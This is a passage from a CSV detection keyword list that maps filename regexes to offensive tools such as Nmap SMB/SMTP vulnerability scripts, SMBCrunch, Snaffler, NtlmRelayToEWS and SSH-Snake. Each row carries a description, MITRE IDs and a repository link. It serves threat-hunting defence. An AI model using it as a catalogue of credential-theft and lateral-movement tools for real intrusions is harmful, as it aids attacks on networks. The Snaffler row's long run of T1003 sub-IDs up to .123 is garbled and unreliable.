Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* SMBGrab.pl*",".{0,1000}\sSMBGrab\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "* SMBHunt.pl*",".{0,1000}\sSMBHunt\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "* SMBList.pl*",".{0,1000}\sSMBList\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "* -SmbLoginSpray 
*",".{0,1000}\s\-SmbLoginSpray\s.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* smb-ls.nse*",".{0,1000}\ssmb\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-mbenum.nse*",".{0,1000}\ssmb\-mbenum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-os-discovery.nse*",".{0,1000}\ssmb\-os\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-print-text.nse*",".{0,1000}\ssmb\-print\-text\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-protocols.nse*",".{0,1000}\ssmb\-protocols\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-psexec.nse*",".{0,1000}\ssmb\-psexec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smbrelayserver.py*",".{0,1000}\ssmbrelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "* smb-security-mode.nse*",".{0,1000}\ssmb\-security\-mode\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-server-stats.nse*",".{0,1000}\ssmb\-server\-stats\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smbsr.db*",".{0,1000}\ssmbsr\.db.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* smbsr.log*",".{0,1000}\ssmbsr\.log.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* smbsr.log*",".{0,1000}\ssmbsr\.log.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* smbsr.py*",".{0,1000}\ssmbsr\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* smbsr_results.csv*",".{0,1000}\ssmbsr_results\.csv.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* 
smb-system-info.nse*",".{0,1000}\ssmb\-system\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-conficker.nse*",".{0,1000}\ssmb\-vuln\-conficker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-cve2009-3103.nse*",".{0,1000}\ssmb\-vuln\-cve2009\-3103\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-cve-2017-7494.nse*",".{0,1000}\ssmb\-vuln\-cve\-2017\-7494\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-ms06-025.nse*",".{0,1000}\ssmb\-vuln\-ms06\-025\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-ms07-029.nse*",".{0,1000}\ssmb\-vuln\-ms07\-029\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-ms08-067.nse*",".{0,1000}\ssmb\-vuln\-ms08\-067\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-ms10-054.nse*",".{0,1000}\ssmb\-vuln\-ms10\-054\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-ms10-061.nse*",".{0,1000}\ssmb\-vuln\-ms10\-061\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-ms17-010.nse*",".{0,1000}\ssmb\-vuln\-ms17\-010\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-regsvc-dos.nse*",".{0,1000}\ssmb\-vuln\-regsvc\-dos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-webexec.nse*",".{0,1000}\ssmb\-vuln\-webexec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-webexec-exploit.nse*",".{0,1000}\ssmb\-webexec\-exploit\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-brute.nse*",".{0,1000}\ssmtp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-commands.nse*",".{0,1000}\ssmtp\-commands\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-enum-users.nse*",".{0,1000}\ssmtp\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-log4shell.nse*",".{0,1000}\ssmtp\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","349","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* smtp-ntlm-info.nse*",".{0,1000}\ssmtp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-open-relay.nse*",".{0,1000}\ssmtp\-open\-relay\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-strangeport.nse*",".{0,1000}\ssmtp\-strangeport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-vuln-cve2010-4344.nse*",".{0,1000}\ssmtp\-vuln\-cve2010\-4344\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-vuln-cve2011-1720.nse*",".{0,1000}\ssmtp\-vuln\-cve2011\-1720\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-vuln-cve2011-1764.nse*",".{0,1000}\ssmtp\-vuln\-cve2011\-1764\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smtp-vuln-cve2020-28017-through-28026-21nails.nse*",".{0,1000}\ssmtp\-vuln\-cve2020\-28017\-through\-28026\-21nails\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","7","620","61","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" "* smuggler.py*",".{0,1000}\ssmuggler\.py.{0,1000}","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","9","3","245","46","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" "* snaffler.log*",".{0,1000}\ssnaffler\.log.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - 
T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","0","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "* snaffler.py *",".{0,1000}\ssnaffler\.py\s.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. 
Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "* Snake.sh *",".{0,1000}\/Snake\.sh.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "* Snake.sh*",".{0,1000}\sSnake\.sh.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","N/A","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "* sniffer-detect.nse*",".{0,1000}\ssniffer\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-brute.nse*",".{0,1000}\ssnmp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-hh3c-logins.nse*",".{0,1000}\ssnmp\-hh3c\-logins\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-info.nse*",".{0,1000}\ssnmp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-interfaces.nse*",".{0,1000}\ssnmp\-interfaces\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-ios-config.nse*",".{0,1000}\ssnmp\-ios\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-netstat.nse*",".{0,1000}\ssnmp\-netstat\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-processes.nse*",".{0,1000}\ssnmp\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-sysdescr.nse*",".{0,1000}\ssnmp\-sysdescr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* snmp-win32-services.nse*",".{0,1000}\ssnmp\-win32\-services\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
